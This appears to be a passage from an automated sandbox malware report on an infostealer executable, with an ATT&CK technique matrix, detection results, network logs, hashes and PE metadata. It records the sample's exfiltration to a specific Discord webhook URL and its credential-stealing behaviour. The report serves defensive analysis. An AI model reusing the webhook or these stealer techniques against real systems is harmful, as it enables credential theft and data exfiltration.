        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation
        Path Interception311
        Process Injection
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        114
        System Information Discovery
        Remote Services11
        Archive Collected Data
        Exfiltration Over Other Network Medium3
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        21
        Input Capture
        111
        Security Software Discovery
        Remote Desktop Protocol1
        Data from Local System
        Exfiltration Over Bluetooth11
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information
        1
        Credentials in Registry
        131
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares1
        Email Collection
        Automated Exfiltration4
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
        Software Packing
        NTDS1
        Application Window Discovery
        Distributed Component Object Model21
        Input Capture
        Scheduled Transfer15
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Timestomp
        LSA Secrets1
        Remote System Discovery
        SSH1
        Clipboard Data
        Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading
        Cached Domain Credentials1
        System Network Configuration Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion
        DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
        Process Injection
        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        e-dekont-20230206.exe41%ReversingLabsByteCode-MSIL.Trojan.GenSteal
        e-dekont-20230206.exe55%VirustotalBrowse
        e-dekont-20230206.exe100%Joe Sandbox ML
        No Antivirus matches
        SourceDetectionScannerLabelLinkDownload
        1.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://discord.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr0%Avira URL Cloudsafe
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F310%Avira URL Cloudsafe
        https://discord.com4Dp0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        162.159.135.232
        truetrue
          unknown
          api4.ipify.org
          64.185.227.155
          truefalse
            high
            api.ipify.org
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                high
                https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osrtrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ipify.orgCasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://discord.comCasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://discord.comCasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://discord.com4DpCasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    64.185.227.155
                    api4.ipify.orgUnited States
                    18450WEBNXUSfalse
                    162.159.135.232
                    discord.comUnited States
                    13335CLOUDFLARENETUStrue
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:800718
                    Start date and time:2023-02-07 18:40:32 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 8m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:e-dekont-20230206.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 17.5% (good quality ratio 13.2%)
                    • Quality average: 49.2%
                    • Quality standard deviation: 37.2%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 29
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    18:41:28API Interceptor994x Sleep call for process: CasPol.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    64.185.227.155M74aRxVX4H.exeGet hashmaliciousBrowse
                    • api.ipify.org/
                    WolcGwXQ5c.exeGet hashmaliciousBrowse
                    • api.ipify.org/?format=wef
                    XZerken3Py.exeGet hashmaliciousBrowse
                    • api.ipify.org/
                    xc17rfFdOM.exeGet hashmaliciousBrowse
                    • api.ipify.org/?format=wef
                    8Ghi4RAfH5.exeGet hashmaliciousBrowse
                    • api.ipify.org/?format=wef
                    fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousBrowse
                    • api.ipify.org/?format=wef
                    file.exeGet hashmaliciousBrowse
                    • api.ipify.org/?format=wef
                    48PTRR4pVY.exeGet hashmaliciousBrowse
                    • api.ipify.org/?format=qwd
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    discord.come-dekont-20230207.exeGet hashmaliciousBrowse
                    • 162.159.128.233
                    RFQ-N-12192.1.exeGet hashmaliciousBrowse
                    • 162.159.138.232
                    OpVrIJpDqF.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    L0EozIGr75.exeGet hashmaliciousBrowse
                    • 162.159.138.232
                    AWVpR481pe.exeGet hashmaliciousBrowse
                    • 162.159.136.232
                    DHL SHIPMENT AND TRACKING NUMBER pdf.exeGet hashmaliciousBrowse
                    • 162.159.138.232
                    j8Vm9XHOvJ.exeGet hashmaliciousBrowse
                    • 162.159.128.233
                    MV BELLIGHT DISCH ABT 46982 MTS OF SOYABEANS IN BULK FORMAL AGENCY APPOINTMENT_pdf.exeGet hashmaliciousBrowse
                    • 162.159.137.232
                    setup.exeGet hashmaliciousBrowse
                    • 162.159.136.232
                    Built.exeGet hashmaliciousBrowse
                    • 162.159.136.232
                    Creal.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    rcm.exeGet hashmaliciousBrowse
                    • 162.159.136.232
                    main.exeGet hashmaliciousBrowse
                    • 162.159.128.233
                    S3zoj9Uts0.exeGet hashmaliciousBrowse
                    • 162.159.138.232
                    uBZeAVcb6r.exeGet hashmaliciousBrowse
                    • 162.159.137.232
                    e-dekont-20230127.exeGet hashmaliciousBrowse
                    • 162.159.137.232
                    XZdImqRrwQ.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    e-dekont-20230202.exeGet hashmaliciousBrowse
                    • 162.159.128.233
                    Request for PO_2023.jsGet hashmaliciousBrowse
                    • 162.159.128.233
                    Payload.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    api4.ipify.orge-dekont-20230207.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    OR98764357890-098.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    PO_72302991PDF.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    PO-7654321.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    Solicitar Cotizacion.pdf.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    AWB NO. 8148557141.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    FAXMESSAGE.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    PAGO SWIFT PDF__.pif.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    FSSC-23-0103000RPM.PDF.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    Encargar art#U00edculos.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    file.vbsGet hashmaliciousBrowse
                    • 173.231.16.76
                    LgeyCTeaGW.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    vjr6Z8GOjQ.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    n8mcz6yv7k.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    https://my-taiken.com/note.htmlGet hashmaliciousBrowse
                    • 173.231.16.76
                    3RejTiuKP7.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    Arrival Notice.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    210909836-042205.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    FOKB2DLFdA.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    gvV0vtivHs.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CLOUDFLARENETUSRoqwnrsun.exeGet hashmaliciousBrowse
                    • 162.159.130.233
                    e-dekont-20230207.exeGet hashmaliciousBrowse
                    • 162.159.128.233
                    Benefit_Enrollment.htmlGet hashmaliciousBrowse
                    • 104.17.25.14
                    XQCOqfWkm8.exeGet hashmaliciousBrowse
                    • 162.159.134.233
                    ACH_Electronic_Deposit.shtmlGet hashmaliciousBrowse
                    • 104.17.25.14
                    Unv67CLhJv.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    Application_debloated.exeGet hashmaliciousBrowse
                    • 162.159.135.233
                    0x000600000001ace8-206.exeGet hashmaliciousBrowse
                    • 104.20.68.143
                    xakJ7het39.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    Hilcorp Bonus Settlement.eml (5.22 KB).msgGet hashmaliciousBrowse
                    • 104.17.25.14
                    https://www.canva.com/design/DAFZ4mIuTRk/xh916WsoV133Oxh-V4YbYw/view?utm_content=DAFZ4mIuTRk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                    • 104.16.57.101
                    PRICE ENQUIRY ENQ REF_PDF_____________________________.........exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exeGet hashmaliciousBrowse
                    • 104.21.79.47
                    https://fruitandpods.com/besnet/empresas/dcab232/Sign_in.phpGet hashmaliciousBrowse
                    • 104.18.1.236
                    210909836-042205.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    https://w0y0bz.webwave.dev/lib/w0y0bz/RFQ02062023-ldslhqdl.html#poststelle@stadt.nuernberg.deGet hashmaliciousBrowse
                    • 104.20.18.53
                    #Ud83d#Udce0 1 of 3 Pages.htmGet hashmaliciousBrowse
                    • 104.18.10.207
                    https://www.googleadservices.com/pagead/aclk?sa=L&ai=CkwvK0P_hY8HmHqzkn88PyfuFuAWgo7fvbs6fqp-VEZGs05XEOBABIIHZ_iFgyQagAZOftLAoyAEJqQLjAdLjEvh5PqgDAcgDywSqBNcBT9DF_iX400IybEW3Pr6wAP-unvMjI3QSAapE6PY1e4nW5NWKB41op30pMboy0XCoPrXu7CNTcCMGeey1XtmKUgKbua3PEd7d8iSVBezN1_nZqT0JcBzMecORTxu_F8eCphEg6iih3KhpzzdErNKbKHo4QV0ywpPFvMuZ3jo2yS4wpXHFiWkk5VTaH9WZi4OenRX7ZqzE2P8_pKVLM30PUS0k-HTbrJJ-9SAoN4qZ0SoufwzHZ2CbVg2_WHfzg3cj_ZXuCwBLBhnHmi0ale5VhZw_d81os6TABPq-rLGbBKAGLoAHnKTY_QOoB47OG6gHk9gbqAfulrECqAf-nrECqAeko7ECqAfVyRuoB6a-G6gHmgaoB_PRG6gHltgbqAeqm7ECqAf_nrECqAffn7EC2AcA0ggPCIBhEAEYHzICigI6AoBAsQkBrnSxVCnjCIAKAZgLAcgLAYAMAbgMAdgTDNAVAfgWAYAXAQ&ae=1&num=1&cid=CAQSOwDUE5ymZxT0dLU_6yG71JZyq7bVZF3KxZaaSOrqGKatE9XZNh61FPPUu9DHSG-OenQe7WgVmA55if6mGAE&sig=AOD64_1lTBUid_DTEGtbwCI40J1FZksITw&client=ca-pub-9816945270938969&rf=1&nb=9&adurl=http://nu.fekru.rlntlss.net%3A%2F%2F%23aHR0cHM6Ly9teWZhbWlseWFjdS5jb20vbmV3L2F1dGgvQ29uZGVuYXN0L2tlZWxleS5rbm93bGVzQGNvbmRlbmFzdC5jby51aw==Get hashmaliciousBrowse
                    • 104.17.25.14
                    RFQ-N-12192.1.exeGet hashmaliciousBrowse
                    • 162.159.138.232
                    http://moon-palace.caGet hashmaliciousBrowse
                    • 104.19.255.55
                    WEBNXUSe-dekont-20230207.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    OR98764357890-098.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    PO_72302991PDF.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    PO-7654321.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    Solicitar Cotizacion.pdf.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    AWB NO. 8148557141.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    FAXMESSAGE.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    PAGO SWIFT PDF__.pif.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    FSSC-23-0103000RPM.PDF.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    Encargar art#U00edculos.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    file.vbsGet hashmaliciousBrowse
                    • 173.231.16.76
                    LgeyCTeaGW.exeGet hashmaliciousBrowse
                    • 64.185.227.155
                    vjr6Z8GOjQ.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    n8mcz6yv7k.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    https://my-taiken.com/note.htmlGet hashmaliciousBrowse
                    • 173.231.16.76
                    3RejTiuKP7.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    Arrival Notice.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    210909836-042205.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    FOKB2DLFdA.exeGet hashmaliciousBrowse
                    • 173.231.16.76
                    gvV0vtivHs.exeGet hashmaliciousBrowse
                    • 104.237.62.211
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    3b5074b1b5d032e5620f69f9f700ff0eRoqwnrsun.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    e-dekont-20230207.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    notes.oneGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    0x000600000001ace8-206.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    OR98764357890-098.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    PO_72302991PDF.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    PO-7654321.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    elementrv Remittance.htmlGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    Solicitar Cotizacion.pdf.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    item.oneGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    210909836-042205.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    AWB NO. 8148557141.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    FAXMESSAGE.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    PAGO SWIFT PDF__.pif.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    Original.oneGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    RFQ-N-12192.1.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    FSSC-23-0103000RPM.PDF.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    svc.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    Req For F1 USD 33 325.00.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    Encargar art#U00edculos.exeGet hashmaliciousBrowse
                    • 162.159.135.232
                    • 64.185.227.155
                    No context
                    Process:C:\Users\user\Desktop\e-dekont-20230206.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):226
                    Entropy (8bit):5.354940450065058
                    Encrypted:false
                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                    MD5:B10E37251C5B495643F331DB2EEC3394
                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.959804344180061
                    TrID:
                    • Win64 Executable GUI Net Framework (217006/5) 47.53%
                    • Win64 Executable GUI (202006/5) 44.25%
                    • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                    • Win64 Executable (generic) (12005/4) 2.63%
                    • Generic Win/DOS Executable (2004/3) 0.44%
                    File name:e-dekont-20230206.exe
                    File size:695808
                    MD5:33a5f92deee382035467caff29a8d487
                    SHA1:7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
                    SHA256:e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
                    SHA512:c2c3a2ffc2719245166a561050a0c4d9ece584dea47997bb5db1cc30885e31e2a5af3cfbb27526835b10bdda71b572c307e8704a1ac53e9119cfe63c760f66af
                    SSDEEP:12288:vjsouJ3dUctF0KHbYXj/oNmsNjMQWwBTMYvwgScpK3J+ZBJwsscBDZn0Vx1NdB:2NUc7TbEDoNtQQWwKYvJScg63scDnu
                    TLSH:46E422177ACF0214D49829B282EF076503E95B85A1B7DABD3F4573AD06723E6BE43702
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........................z... ........... ....@...... ....................................`................................
                    Icon Hash:92aca8b2b2a2b286
                    Entrypoint:0x400000
                    Entrypoint Section:
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:
                    Instruction
                    dec ebp
                    pop edx
                    nop
                    add byte ptr [ebx], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x1b8c.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xa98da0x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000xa79740xa7a00False0.9695758179530202data7.97077131969678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .sdata0xaa0000x1e80x200False0.86328125data6.5950997415198165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xac0000x1b8c0x1c00False0.34444754464285715data5.438495976746426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    RT_ICON0xac1600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                    RT_ICON0xad2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                    RT_GROUP_ICON0xad6700x22data
                    RT_VERSION0xad6940x30cdata
                    RT_MANIFEST0xad9a00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.5162.159.135.232497034432851779 02/07/23-18:41:32.301093TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49703443192.168.2.5162.159.135.232
                    TimestampSource PortDest PortSource IPDest IP
                    Feb 7, 2023 18:41:27.266633987 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.266757011 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.266869068 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.355532885 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.355787039 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.679862976 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.680044889 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.696712971 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:27.696759939 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.697472095 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:27.746340990 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:28.034023046 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:28.034092903 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:28.132925987 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:28.133024931 CET4434970264.185.227.155192.168.2.5
                    Feb 7, 2023 18:41:28.133107901 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:28.134315968 CET49702443192.168.2.564.185.227.155
                    Feb 7, 2023 18:41:32.177478075 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.177515984 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.177587032 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.178462982 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.178472042 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.237952948 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.238046885 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.240590096 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.240601063 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.241060019 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.243566990 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.243582010 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.300604105 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.300971985 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.300987959 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.434633017 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.434804916 CET44349703162.159.135.232192.168.2.5
                    Feb 7, 2023 18:41:32.434914112 CET49703443192.168.2.5162.159.135.232
                    Feb 7, 2023 18:41:32.509637117 CET49703443192.168.2.5162.159.135.232
                    TimestampSource PortDest PortSource IPDest IP
                    Feb 7, 2023 18:41:27.189271927 CET6064953192.168.2.58.8.8.8
                    Feb 7, 2023 18:41:27.209341049 CET53606498.8.8.8192.168.2.5
                    Feb 7, 2023 18:41:27.222088099 CET5144153192.168.2.58.8.8.8
                    Feb 7, 2023 18:41:27.244609118 CET53514418.8.8.8192.168.2.5
                    Feb 7, 2023 18:41:32.139256954 CET4917753192.168.2.58.8.8.8
                    Feb 7, 2023 18:41:32.159280062 CET53491778.8.8.8192.168.2.5
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Feb 7, 2023 18:41:27.189271927 CET192.168.2.58.8.8.80x302eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:27.222088099 CET192.168.2.58.8.8.80x612dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                    Feb 7, 2023 18:41:32.139256954 CET192.168.2.58.8.8.80x8350Standard query (0)discord.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                    Feb 7, 2023 18:41:27.209341049 CET8.8.8.8192.168.2.50x302eNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
